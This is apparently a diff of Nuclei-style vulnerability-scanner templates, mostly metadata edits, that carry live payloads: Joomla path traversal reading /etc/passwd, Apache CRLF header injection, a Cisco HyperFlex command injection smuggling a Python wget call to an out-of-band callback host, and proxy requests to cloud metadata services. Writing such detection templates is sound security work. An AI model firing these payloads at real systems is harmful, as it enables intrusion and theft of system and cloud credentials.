- type: regex - type: regex
regex: regex:
- "root:.*:0:0" - "root:.*:0:0"
- type: status - type: status
status: status:
- 200 - 200
# Enhanced by mp on 2022/02/14

View File

@ -4,24 +4,25 @@ info:
name: Joomla! Component Advertising 0.25 - Local File Inclusion name: Joomla! Component Advertising 0.25 - Local File Inclusion
author: daffainfo author: daffainfo
severity: high severity: high
description: Directory traversal vulnerability in the Advertising (com_advertising) component 0.25 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. description: A directory traversal vulnerability in the Advertising (com_advertising) component 0.25 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference: reference:
- https://www.exploit-db.com/exploits/12171 - https://www.exploit-db.com/exploits/12171
- https://www.cvedetails.com/cve/CVE-2010-1473 - https://www.cvedetails.com/cve/CVE-2010-1473
tags: cve,cve2010,joomla,lfi tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1473
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00" - "{{BaseURL}}/index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: regex - type: regex
regex: regex:
- "root:.*:0:0" - "root:.*:0:0"
- type: status - type: status
status: status:
- 200 - 200
# Enhanced by mp on 2022/02/14

View File

@ -4,24 +4,25 @@ info:
name: Joomla! Component Sweetykeeper 1.5 - Local File Inclusion name: Joomla! Component Sweetykeeper 1.5 - Local File Inclusion
author: daffainfo author: daffainfo
severity: high severity: high
description: Directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper) component 1.5.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. description: A directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper) component 1.5.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference: reference:
- https://www.exploit-db.com/exploits/12182 - https://www.exploit-db.com/exploits/12182
- https://www.cvedetails.com/cve/CVE-2010-1474 - https://www.cvedetails.com/cve/CVE-2010-1474
tags: cve,cve2010,joomla,lfi tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1474
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00" - "{{BaseURL}}/index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: regex - type: regex
regex: regex:
- "root:.*:0:0" - "root:.*:0:0"
- type: status - type: status
status: status:
- 200 - 200
# Enhanced by mp on 2022/02/14

View File

@ -4,24 +4,25 @@ info:
name: Joomla! Component Preventive And Reservation 1.0.5 - Local File Inclusion name: Joomla! Component Preventive And Reservation 1.0.5 - Local File Inclusion
author: daffainfo author: daffainfo
severity: high severity: high
description: Directory traversal vulnerability in the Preventive & Reservation (com_preventive) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. description: A directory traversal vulnerability in the Preventive & Reservation (com_preventive) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference: reference:
- https://www.exploit-db.com/exploits/12147 - https://www.exploit-db.com/exploits/12147
- https://www.cvedetails.com/cve/CVE-2010-1475 - https://www.cvedetails.com/cve/CVE-2010-1475
tags: cve,cve2010,joomla,lfi tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1475
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00" - "{{BaseURL}}/index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00"
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: regex - type: regex
regex: regex:
- "root:.*:0:0" - "root:.*:0:0"
- type: status - type: status
status: status:
- 200 - 200
# Enhanced by mp on 2022/02/14

View File

@ -4,24 +4,25 @@ info:
name: Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion name: Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion
author: daffainfo author: daffainfo
severity: high severity: high
description: Directory traversal vulnerability in the AlphaUserPoints (com_alphauserpoints) component 1.5.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the view parameter to index.php. description: A directory traversal vulnerability in the AlphaUserPoints (com_alphauserpoints) component 1.5.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the view parameter to index.php.
remediation: Upgrade to a supported version.
reference: reference:
- https://www.exploit-db.com/exploits/12150 - https://www.exploit-db.com/exploits/12150
- https://www.cvedetails.com/cve/CVE-2010-1476 - https://www.cvedetails.com/cve/CVE-2010-1476
tags: cve,cve2010,joomla,lfi tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1476
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00" - "{{BaseURL}}/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00"
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: regex - type: regex
regex: regex:
- "root:.*:0:0" - "root:.*:0:0"
- type: status - type: status
status: status:
- 200 - 200
# Enhanced by mp on 2022/02/14

View File

@ -4,24 +4,26 @@ info:
name: Joomla! Component Jfeedback 1.2 - Local File Inclusion name: Joomla! Component Jfeedback 1.2 - Local File Inclusion
author: daffainfo author: daffainfo
severity: high severity: high
description: Directory traversal vulnerability in the Ternaria Informatica Jfeedback! (com_jfeedback) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. description: A directory traversal vulnerability in the Ternaria Informatica Jfeedback! (com_jfeedback) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference: | reference: |
- https://www.exploit-db.com/exploits/12145 - https://www.exploit-db.com/exploits/12145
- https://www.cvedetails.com/cve/CVE-2010-1478 - https://www.cvedetails.com/cve/CVE-2010-1478
tags: cve,cve2010,joomla,lfi tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1478
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/index.php?option=com_jfeedback&controller=../../../../../../../../../../etc/passwd%00" - "{{BaseURL}}/index.php?option=com_jfeedback&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: regex - type: regex
regex: regex:
- "root:.*:0:0" - "root:.*:0:0"
- type: status - type: status
status: status:
- 200 - 200
# Enhanced by mp on 2022/02/14

View File

@ -4,24 +4,25 @@ info:
name: Joomla! Component MMS Blog 2.3.0 - Local File Inclusion name: Joomla! Component MMS Blog 2.3.0 - Local File Inclusion
author: daffainfo author: daffainfo
severity: high severity: high
description: Directory traversal vulnerability in the MMS Blog (com_mmsblog) component 2.3.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. description: A directory traversal vulnerability in the MMS Blog (com_mmsblog) component 2.3.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference: reference:
- https://www.exploit-db.com/exploits/12318 - https://www.exploit-db.com/exploits/12318
- https://www.cvedetails.com/cve/CVE-2010-1491 - https://www.cvedetails.com/cve/CVE-2010-1491
tags: cve,cve2010,joomla,lfi tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1491
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/index.php?option=com_mmsblog&controller=../../../../../../../../../../etc/passwd%00" - "{{BaseURL}}/index.php?option=com_mmsblog&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: regex - type: regex
regex: regex:
- "root:.*:0:0" - "root:.*:0:0"
- type: status - type: status
status: status:
- 200 - 200
# Enhanced by mp on 2022/02/14

View File

@ -4,24 +4,25 @@ info:
name: Joomla! Component AWDwall 1.5.4 - Local File Inclusion name: Joomla! Component AWDwall 1.5.4 - Local File Inclusion
author: daffainfo author: daffainfo
severity: high severity: high
description: Directory traversal vulnerability in the AWDwall (com_awdwall) component 1.5.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. description: A directory traversal vulnerability in the AWDwall (com_awdwall) component 1.5.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference: reference:
- https://www.exploit-db.com/exploits/12113 - https://www.exploit-db.com/exploits/12113
- https://www.cvedetails.com/cve/CVE-2010-1494 - https://www.cvedetails.com/cve/CVE-2010-1494
tags: cve,cve2010,joomla,lfi tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1494
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00" - "{{BaseURL}}/index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: regex - type: regex
regex: regex:
- "root:.*:0:0" - "root:.*:0:0"
- type: status - type: status
status: status:
- 200 - 200
# Enhanced by mp on 2022/02/14

View File

@ -4,24 +4,25 @@ info:
name: Joomla! Component Matamko 1.01 - Local File Inclusion name: Joomla! Component Matamko 1.01 - Local File Inclusion
author: daffainfo author: daffainfo
severity: high severity: high
description: Directory traversal vulnerability in the Matamko (com_matamko) component 1.01 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. description: A directory traversal vulnerability in the Matamko (com_matamko) component 1.01 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference: reference:
- https://www.exploit-db.com/exploits/12286 - https://www.exploit-db.com/exploits/12286
- https://www.cvedetails.com/cve/CVE-2010-1495 - https://www.cvedetails.com/cve/CVE-2010-1495
tags: cve,cve2010,joomla,lfi tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1495
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00" - "{{BaseURL}}/index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: regex - type: regex
regex: regex:
- "root:.*:0:0" - "root:.*:0:0"
- type: status - type: status
status: status:
- 200 - 200
# Enhanced by mp on 2022/02/14

View File

@ -4,24 +4,25 @@ info:
name: Joomla! Component redSHOP 1.0 - Local File Inclusion name: Joomla! Component redSHOP 1.0 - Local File Inclusion
author: daffainfo author: daffainfo
severity: high severity: high
description: Directory traversal vulnerability in the redSHOP (com_redshop) component 1.0.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. description: A directory traversal vulnerability in the redSHOP (com_redshop) component 1.0.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
remediation: Upgrade to a supported version.
reference: reference:
- https://www.exploit-db.com/exploits/12054 - https://www.exploit-db.com/exploits/12054
- https://www.cvedetails.com/cve/CVE-2010-1531 - https://www.cvedetails.com/cve/CVE-2010-1531
tags: cve,cve2010,joomla,lfi tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1531
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00" - "{{BaseURL}}/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: regex - type: regex
regex: regex:
- "root:.*:0:0" - "root:.*:0:0"
- type: status - type: status
status: status:
- 200 - 200
# Enhanced by mp on 2022/02/14

View File

@ -2,10 +2,14 @@ id: CVE-2016-4975
info: info:
name: Apache mod_userdir CRLF injection name: Apache mod_userdir CRLF injection
author: melbadry9,nadino,xElkomy,sullo author: melbadry9,nadino,xElkomy
severity: low severity: medium
description: Apache CRLF injection allowing HTTP response splitting attacks on sites using mod_userdir. description: Apache CRLF injection allowing HTTP response splitting attacks on sites using mod_userdir.
remediation: Upgrade to Apache HTTP Server 2.2.32/2.4.25 or higher.
tags: crlf,generic,cves,cve2016,apache tags: crlf,generic,cves,cve2016,apache
reference:
- https://httpd.apache.org/security/vulnerabilities_22.html#CVE-2016-4975
- https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2016-4975
classification: classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1 cvss-score: 6.1
@ -16,9 +20,9 @@ requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/~user/%0D%0ASet-Cookie:crlfinjection" - "{{BaseURL}}/~user/%0D%0ASet-Cookie:crlfinjection"
matchers: matchers:
- type: regex - type: regex
regex: regex:
- '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)' - '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)'
part: header part: header
# Enhanced by cs on 2022/02/14

View File

@ -1,9 +1,8 @@
id: CVE-2021-1497 id: CVE-2021-1497
info: info:
name: Cisco HyperFlex HX Data Platform RCE name: Cisco HyperFlex HX Data Platform RCE
description: Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. description: Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
author: gy741,sullo author: gy741
severity: critical severity: critical
reference: reference:
- https://swarm.ptsecurity.com/cisco-hyperflex-how-we-got-rce-through-login-form-and-other-findings/ - https://swarm.ptsecurity.com/cisco-hyperflex-how-we-got-rce-through-login-form-and-other-findings/
@ -19,7 +18,6 @@ info:
cvss-score: 9.80 cvss-score: 9.80
cve-id: CVE-2021-1497 cve-id: CVE-2021-1497
cwe-id: CWE-78 cwe-id: CWE-78
requests: requests:
- raw: - raw:
- | - |
@ -27,23 +25,20 @@ requests:
Host: {{Hostname}} Host: {{Hostname}}
Accept: */* Accept: */*
Content-Type: application/x-www-form-urlencoded Content-Type: application/x-www-form-urlencoded
username=root&password={{url_encode('123\",\"$6$$\"));import os;os.system(\"wget http://{{interactsh-url}}\");print(crypt.crypt(\"')}} username=root&password={{url_encode('123\",\"$6$$\"));import os;os.system(\"wget http://{{interactsh-url}}\");print(crypt.crypt(\"')}}
- | - |
POST /auth HTTP/1.1 POST /auth HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
Accept: */* Accept: */*
Content-Type: application/x-www-form-urlencoded Content-Type: application/x-www-form-urlencoded
username=root&password={{url_encode('123\",\"$6$$\"));import os;os.system(\"wget http://{{interactsh-url}}\");print(crypt.crypt(\"')}} username=root&password={{url_encode('123\",\"$6$$\"));import os;os.system(\"wget http://{{interactsh-url}}\");print(crypt.crypt(\"')}}
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: status - type: status
status: status:
- 200 - 200
- type: word - type: word
part: interactsh_protocol # Confirms the HTTP Interaction part: interactsh_protocol # Confirms the HTTP Interaction
words: words:
- "http" - "http"
# Enhanced by cs on 2022/02/14

View File

@ -18,6 +18,7 @@ requests:
- "{{BaseURL}}/xampp/phpmyadmin/scripts/setup.php" - "{{BaseURL}}/xampp/phpmyadmin/scripts/setup.php"
- "{{BaseURL}}/sysadmin/phpMyAdmin/scripts/setup.php" - "{{BaseURL}}/sysadmin/phpMyAdmin/scripts/setup.php"
- "{{BaseURL}}/phpmyadmin/setup/index.php" - "{{BaseURL}}/phpmyadmin/setup/index.php"
- "{{BaseURL}}/pma/setup/index.php"
stop-at-first-match: true stop-at-first-match: true
matchers-condition: and matchers-condition: and

View File

@ -1,19 +1,17 @@
id: metadata-service-alibaba id: metadata-service-alibaba
# This attack abuses a misconfigured proxy that allows access to the metadata # This attack abuses a misconfigured proxy that allows access to the metadata
# IP or a name which resolves to the IP. A standard proxy request is made to # IP or a name which resolves to the IP. A standard proxy request is made to
# the proxy using the full metadata URL, which the proxy will fulfull to its # the proxy using the full metadata URL, which the proxy will fulfill to its
# own metadata sevice. # own metadata service.
# #
# The proxy may also be vulnerable to host/port enumeration on localhost or # The proxy may also be vulnerable to host/port enumeration on localhost or
# inside the private network. # inside the private network.
info: info:
name: Alibaba Metadata Service Check name: Alibaba Metadata Service Check
author: sullo author: sullo
severity: critical severity: critical
description: The Alibaba host is configured as a proxy which allows access to the metadata service. This could allow significant access to the host/infrastructure. description: The Alibaba host is configured as a proxy which allows access to the metadata service. This could allow significant access to the host/infrastructure.
remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible.
reference: reference:
- https://www.alibabacloud.com/help/doc-detail/108460.htm - https://www.alibabacloud.com/help/doc-detail/108460.htm
- https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/ - https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/
@ -23,21 +21,19 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
cvss-score: 9.3 cvss-score: 9.3
cwe-id: CWE-441 cwe-id: CWE-441
requests: requests:
- raw: - raw:
- |+ - |+
GET http://{{hostval}}/dynamic/instance-identity/document HTTP/1.1 GET http://{{hostval}}/dynamic/instance-identity/document HTTP/1.1
Host: {{hostval}} Host: {{hostval}}
payloads: payloads:
hostval: hostval:
- alibaba.interact.sh - alibaba.interact.sh
- 100.100.100.200 - 100.100.100.200
unsafe: true unsafe: true
matchers: matchers:
- type: word - type: word
part: body part: body
words: words:
- "zone-id" - "zone-id"
# Enhanced by cs on 2022/02/14

View File

@ -1,19 +1,17 @@
id: metadata-service-aws id: metadata-service-aws
# This attack abuses a misconfigured proxy that allows access to the metadata # This attack abuses a misconfigured proxy that allows access to the metadata
# IP or a name which resolves to the IP. A standard proxy request is made to # IP or a name which resolves to the IP. A standard proxy request is made to
# the proxy using the full metadata URL, which the proxy will fulfull to its # the proxy using the full metadata URL, which the proxy will fulfill to its
# own metadata sevice. # own metadata service.
# #
# The proxy may also be vulnerable to host/port enumeration on localhost or # The proxy may also be vulnerable to host/port enumeration on localhost or
# inside the private network. # inside the private network.
info: info:
name: Amazon AWS Metadata Service Check name: Amazon AWS Metadata Service Check
author: sullo author: sullo
severity: critical severity: critical
description: The AWS host is configured as a proxy which allows access to the metadata service. This could allow significant access to the host/infrastructure. Upgrade to IMDSv2. description: The AWS host is configured as a proxy which allows access to the metadata service. This could allow significant access to the host/infrastructure. Upgrade to IMDSv2.
remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible.
reference: reference:
- https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html
- https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/ - https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/
@ -23,18 +21,15 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
cvss-score: 9.3 cvss-score: 9.3
cwe-id: CWE-441 cwe-id: CWE-441
requests: requests:
- raw: - raw:
- |+ - |+
GET http://{{hostval}}/latest/meta-data/ HTTP/1.1 GET http://{{hostval}}/latest/meta-data/ HTTP/1.1
Host: {{hostval}} Host: {{hostval}}
payloads: payloads:
hostval: hostval:
- aws.interact.sh - aws.interact.sh
- 169.254.169.254 - 169.254.169.254
unsafe: true unsafe: true
matchers: matchers:
- type: word - type: word
@ -43,3 +38,4 @@ requests:
- "public-ipv4" - "public-ipv4"
- "privateIp" - "privateIp"
condition: or condition: or
# Enhanced by cs on 2022/02/14

View File

@ -1,19 +1,17 @@
id: metadata-service-azure id: metadata-service-azure
# This attack abuses a misconfigured proxy that allows access to the metadata # This attack abuses a misconfigured proxy that allows access to the metadata
# IP or a name which resolves to the IP. A standard proxy request is made to # IP or a name which resolves to the IP. A standard proxy request is made to
# the proxy using the full metadata URL, which the proxy will fulfull to its # the proxy using the full metadata URL, which the proxy will fulfill to its
# own metadata sevice. # own metadata service.
# #
# The proxy may also be vulnerable to host/port enumeration on localhost or # The proxy may also be vulnerable to host/port enumeration on localhost or
# inside the private network. # inside the private network.
info: info:
name: Microsoft Azure Cloud Metadata Service Check name: Microsoft Azure Cloud Metadata Service Check
author: sullo author: sullo
severity: critical severity: critical
description: The Microsoft Azure cloud host is configured as a proxy which allows access to the instance metadata service. This could allow significant access to the host/infrastructure. description: The Microsoft Azure cloud host is configured as a proxy which allows access to the instance metadata service. This could allow significant access to the host/infrastructure.
remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible.
reference: reference:
- https://docs.microsoft.com/en-us/azure/virtual-machines/linux/instance-metadata-service?tabs=windows - https://docs.microsoft.com/en-us/azure/virtual-machines/linux/instance-metadata-service?tabs=windows
- https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/ - https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/
@ -23,19 +21,16 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
cvss-score: 9.3 cvss-score: 9.3
cwe-id: CWE-441 cwe-id: CWE-441
requests: requests:
- raw: - raw:
- |+ - |+
GET http://{{hostval}}/metadata/instance?api-version=2021-02-01 HTTP/1.1 GET http://{{hostval}}/metadata/instance?api-version=2021-02-01 HTTP/1.1
Host: {{hostval}} Host: {{hostval}}
Metadata: true Metadata: true
payloads: payloads:
hostval: hostval:
- aws.interact.sh - aws.interact.sh
- 169.254.169.254 - 169.254.169.254
unsafe: true unsafe: true
matchers: matchers:
- type: word - type: word
@ -44,3 +39,4 @@ requests:
- "osType" - "osType"
- "ipAddress" - "ipAddress"
condition: and condition: and
# Enhanced by cs on 2022/02/14

View File

@ -1,19 +1,17 @@
id: metadata-service-digitalocean id: metadata-service-digitalocean
# This attack abuses a misconfigured proxy that allows access to the metadata # This attack abuses a misconfigured proxy that allows access to the metadata
# IP or a name which resolves to the IP. A standard proxy request is made to # IP or a name which resolves to the IP. A standard proxy request is made to
# the proxy using the full metadata URL, which the proxy will fulfull to its # the proxy using the full metadata URL, which the proxy will fulfill to its
# own metadata sevice. # own metadata service.
# #
# The proxy may also be vulnerable to host/port enumeration on localhost or # The proxy may also be vulnerable to host/port enumeration on localhost or
# inside the private network. # inside the private network.
info: info:
name: DigitalOcean Metadata Service Check name: DigitalOcean Metadata Service Check
author: sullo author: sullo
severity: critical severity: critical
description: The DigitalOcean host is configured as a proxy which allows access to the instance metadata service. This could allow significant access to the host/infrastructure. description: The DigitalOcean host is configured as a proxy which allows access to the instance metadata service. This could allow significant access to the host/infrastructure.
remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible.
reference: reference:
- https://developers.digitalocean.com/documentation/metadata/ - https://developers.digitalocean.com/documentation/metadata/
- https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/ - https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/
@ -23,21 +21,19 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
cvss-score: 9.3 cvss-score: 9.3
cwe-id: CWE-441 cwe-id: CWE-441
requests: requests:
- raw: - raw:
- |+ - |+
GET http://{{hostval}}/metadata/v1.json HTTP/1.1 GET http://{{hostval}}/metadata/v1.json HTTP/1.1
Host: {{hostval}} Host: {{hostval}}
payloads: payloads:
hostval: hostval:
- aws.interact.sh - aws.interact.sh
- 169.254.169.254 - 169.254.169.254
unsafe: true unsafe: true
matchers: matchers:
- type: word - type: word
part: body part: body
words: words:
- "droplet_id" - "droplet_id"
# Enhanced by cs on 2022/02/14

View File

@ -1,19 +1,17 @@
id: metadata-service-gcp id: metadata-service-gcp
# This attack abuses a misconfigured proxy that allows access to the metadata # This attack abuses a misconfigured proxy that allows access to the metadata
# IP or a name which resolves to the IP. A standard proxy request is made to # IP or a name which resolves to the IP. A standard proxy request is made to
# the proxy using the full metadata URL, which the proxy will fulfull to its # the proxy using the full metadata URL, which the proxy will fulfill to its
# own metadata sevice. # own metadata service.
# #
# The proxy may also be vulnerable to host/port enumeration on localhost or # The proxy may also be vulnerable to host/port enumeration on localhost or
# inside the private network. # inside the private network.
info: info:
name: Google GCP Metadata Service Check name: Google GCP Metadata Service Check
author: sullo author: sullo
severity: critical severity: critical
description: The Google cloud (GCP) host is configured as a proxy which allows access to the instance metadata service. This could allow significant access to the host/infrastructure. description: The Google cloud (GCP) host is configured as a proxy which allows access to the instance metadata service. This could allow significant access to the host/infrastructure.
remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible.
reference: reference:
- https://cloud.google.com/compute/docs/metadata/default-metadata-values - https://cloud.google.com/compute/docs/metadata/default-metadata-values
- https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/ - https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/
@ -23,22 +21,20 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
cvss-score: 9.3 cvss-score: 9.3
cwe-id: CWE-441 cwe-id: CWE-441
requests: requests:
- raw: - raw:
- |+ - |+
GET http://{{hostval}}/computeMetadata/v1/project/ HTTP/1.1 GET http://{{hostval}}/computeMetadata/v1/project/ HTTP/1.1
Host: {{hostval}} Host: {{hostval}}
Metadata-Flavor: Google Metadata-Flavor: Google
payloads: payloads:
hostval: hostval:
- aws.interact.sh - aws.interact.sh
- 169.254.169.254 - 169.254.169.254
unsafe: true unsafe: true
matchers: matchers:
- type: word - type: word
part: body part: body
words: words:
- "attributes/" - "attributes/"
# Enhanced by cs on 2022/02/14

View File

@ -1,19 +1,17 @@
id: metadata-service-hetzner id: metadata-service-hetzner
# This attack abuses a misconfigured proxy that allows access to the metadata # This attack abuses a misconfigured proxy that allows access to the metadata
# IP or a name which resolves to the IP. A standard proxy request is made to # IP or a name which resolves to the IP. A standard proxy request is made to
# the proxy using the full metadata URL, which the proxy will fulfull to its # the proxy using the full metadata URL, which the proxy will fulfill to its
# own metadata sevice. # own metadata service.
# #
# The proxy may also be vulnerable to host/port enumeration on localhost or # The proxy may also be vulnerable to host/port enumeration on localhost or
# inside the private network. # inside the private network.
info: info:
name: Hetzner Cloud Metadata Service Check name: Hetzner Cloud Metadata Service Check
author: sullo author: sullo
severity: critical severity: critical
description: The Hetzner Cloud host is configured as a proxy which allows access to the instance metadata service. This could allow significant access to the host/infrastructure. description: The Hetzner Cloud host is configured as a proxy which allows access to the instance metadata service. This could allow significant access to the host/infrastructure.
remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible.
reference: reference:
- https://docs.hetzner.cloud/#server-metadata - https://docs.hetzner.cloud/#server-metadata
- https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/ - https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/
@ -23,18 +21,15 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
cvss-score: 9.3 cvss-score: 9.3
cwe-id: CWE-441 cwe-id: CWE-441
requests: requests:
- raw: - raw:
- |+ - |+
GET http://{{hostval}}/v1/metadata/private-networks HTTP/1.1 GET http://{{hostval}}/v1/metadata/private-networks HTTP/1.1
Host: {{hostval}} Host: {{hostval}}
payloads: payloads:
hostval: hostval:
- aws.interact.sh - aws.interact.sh
